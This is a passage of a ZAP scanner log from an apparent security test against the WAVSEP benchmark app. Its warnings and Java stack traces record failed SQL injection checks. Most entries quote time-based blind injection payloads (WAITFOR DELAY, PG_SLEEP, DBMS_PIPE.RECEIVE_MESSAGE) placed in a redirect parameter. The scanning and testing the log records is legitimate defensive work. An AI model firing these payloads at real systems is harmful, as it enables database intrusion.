CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'lmrG'='lmrG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'lmrG'='lmrG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679323 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 8137=(SELECT 8137 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 8137=(SELECT 8137 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679323 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679324 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 5407=(SELECT 5407 FROM PG_SLEEP(5))-- yqLZ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 5407=(SELECT 5407 FROM PG_SLEEP(5))-- yqLZ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679324 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- KzXL] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- KzXL at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679325 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (9310=9310] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (9310=9310 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679326 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) AND 4026=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(86)||CHR(103)||CHR(115),5) AND (3078=3078] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) AND 4026=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(86)||CHR(103)||CHR(115),5) AND (3078=3078 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679327 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 5007=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(98)||CHR(110)||CHR(74),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 5007=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(98)||CHR(110)||CHR(74),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679327 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679328 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 5991=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(110)||CHR(107)||CHR(68),5) AND ('mLrB'='mLrB] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 5991=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(110)||CHR(107)||CHR(68),5) AND ('mLrB'='mLrB at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679329 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('dzvA'='dzvA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('dzvA'='dzvA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679330 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 6902=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(72)||CHR(89)||CHR(76),5) AND 'lNEX'='lNEX] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 6902=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(72)||CHR(89)||CHR(76),5) AND 'lNEX'='lNEX at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679330 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'YbOH'='YbOH] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'YbOH'='YbOH at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown 